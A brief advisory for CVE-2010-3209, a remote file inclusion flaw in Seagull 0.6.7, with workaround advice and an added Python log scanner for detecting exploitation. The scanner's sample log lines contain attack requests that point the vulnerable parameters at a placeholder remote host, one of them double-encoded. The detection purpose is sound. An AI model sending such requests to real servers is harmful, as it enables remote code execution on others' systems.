Seagull · Seagull · CVE-2010-3209
**Name of the Vulnerable Software and Affected Versions**
Seagull version 0.6.7
**Description**
The issue allows remote attackers to execute arbitrary PHP code. This can be achieved via a URL in the `includeFile` parameter to (1) `Config/Container.php` and (2) `HTML/QuickForm.php` in `fog/lib/pear/`, the (3) `driverpath` parameter to `fog/lib/pear/DB/NestedSet.php`, and the (4) `path` parameter to `fog/lib/pear/DB/NestedSet/Output.php`.
**Recommendations**
For Seagull version 0.6.7, consider restricting access to the `includeFile`, `driverpath`, and `path` parameters of the affected scripts until a patch is available. As a temporary workaround, avoid using these parameters in the affected files under `fog/lib/pear/`, specifically `Config/Container.php`, `HTML/QuickForm.php`, `DB/NestedSet.php`, and `DB/NestedSet/Output.php`.
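
To check whether the four script and parameter pairs from the description have been requested on a server, web access logs can be scanned for them. The following is an added example, not part of the advisory or of Seagull; it assumes Apache combined log format, and the log lines, client addresses and host names in it are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script path suffix -> parameter named in the advisory for that script.
AFFECTED = {
    "fog/lib/pear/Config/Container.php": "includeFile",
    "fog/lib/pear/HTML/QuickForm.php": "includeFile",
    "fog/lib/pear/DB/NestedSet.php": "driverpath",
    "fog/lib/pear/DB/NestedSet/Output.php": "path",
}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.I)

# Constructed sample lines (assumed combined log format, placeholder hosts).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Sep/2010:10:01:22 +0000] "GET /seagull/fog/lib/pear/Config/Container.php?includeFile=http://host.example.invalid/a.txt HTTP/1.1" 200 512',
    '198.51.100.7 - - [12/Sep/2010:10:01:25 +0000] "GET /seagull/fog/lib/pear/DB/NestedSet.php?driverpath=http%253A%252F%252Fhost.example.invalid%252Fa.txt HTTP/1.1" 200 0',
    '203.0.113.20 - - [12/Sep/2010:10:04:02 +0000] "GET /seagull/fog/lib/pear/DB/NestedSet/Output.php?path=local/ HTTP/1.1" 404 210',
    '203.0.113.20 - - [12/Sep/2010:10:04:09 +0000] "GET /seagull/index.php?path=http://host.example.invalid/ HTTP/1.1" 200 900',
]

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding so a double-encoded URL is still recognised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(lines):
    """Return one finding per request that sets an advisory parameter on an affected script."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        path = fully_decode(url.path)
        param = next((p for s, p in AFFECTED.items() if path.endswith("/" + s)), None)
        if param is None:
            continue
        for key, raw in parse_qsl(url.query, keep_blank_values=True):
            if key == param:
                value = fully_decode(raw)
                kind = "remote-url" if SCHEME.match(value) else "param-set"
                findings.append((client, url.path, param, value, kind, int(status)))
    return findings
```

Each finding is a tuple of client, path, parameter, decoded value, kind and HTTP status; `remote-url` findings with a 200 status are the ones to triage first, while `param-set` marks any other use of the parameters the recommendations say to avoid.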